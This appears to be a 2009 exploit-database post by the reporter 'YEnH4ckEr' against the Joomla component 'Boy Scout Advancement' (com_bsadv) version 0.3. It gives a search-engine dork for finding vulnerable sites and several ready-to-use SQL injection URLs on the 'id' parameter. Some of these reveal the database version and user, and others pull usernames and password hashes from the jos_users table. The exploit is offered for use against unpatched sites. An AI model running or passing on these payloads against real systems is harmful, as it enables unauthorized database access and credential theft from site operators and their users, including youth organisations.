Joomla Boy Scout Advancement 0.3 (id) SQL Injection Exploit

2009-05-26T00:00:00
ID 1337DAY-ID-5239
Type zdt
Reporter YEnH4ckEr
Modified 2009-05-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
Joomla Boy Scout Advancement 0.3 (id) SQL Injection Exploit
===========================================================


----------------------------------------------------------------------------------------------
|       	   	        MULTIPLE SQL INJECTION VULNERABILITIES        	             |
|--------------------------------------------------------------------------------------------|
|                  | Joomla Component 'Boy Scout Advancement' <= v-0.3 (com_bsadv) |         |
|CMS INFORMATION:   ---------------------------------------------------------------          |
|										             |
|-->WEB: http://bsadv.sourceforge.net/					          	     |
|-->DOWNLOAD: http://bsadv.sourceforge.net/				                     |
|-->DEMO: N/A										     |
|-->CATEGORY: Joomla/Component								     |
|-->DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and advancement     |
|		data for Boy Scout Troops in the United States...			     |
|-->RELEASED: 2009-02-01								     |
|											     |
|CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3						                     |
|-->DORK --> inurl:"?option=com_bsadv"						             |
|-->CATEGORY: SQL INJECTION							             |
|-->AFFECT VERSION: <= 0.3						 		     |
|-->Discovered Bug date: 2009-05-25							     |
|-->Reported Bug date: 2009-05-25							     |
|-->Fixed bug date: Not fixed								     |
|-->Info patch: Not fixed							             |
|-->Author: YEnH4ckEr									     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


############################
///////////////////////////

SQL INJECTION VULNS (SQLi):

///////////////////////////
############################



<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>



-------------------
PROOFS OF CONCEPT:
-------------------



[++] GET var --> 'id'


~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23


[++] GET var --> 'id'


~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+database(),version()%23&Itemid=57



[++[Return]++] ~~~~~> User, version or database.



-----------
EXPLOITS:
-----------



~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23



[++[Return]++] ~~~~~> Username:::password id=62



~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62%23&Itemid=57



[++[Return]++] ~~~~~> Username and password id=62




#  0day.today [2018-01-09]  #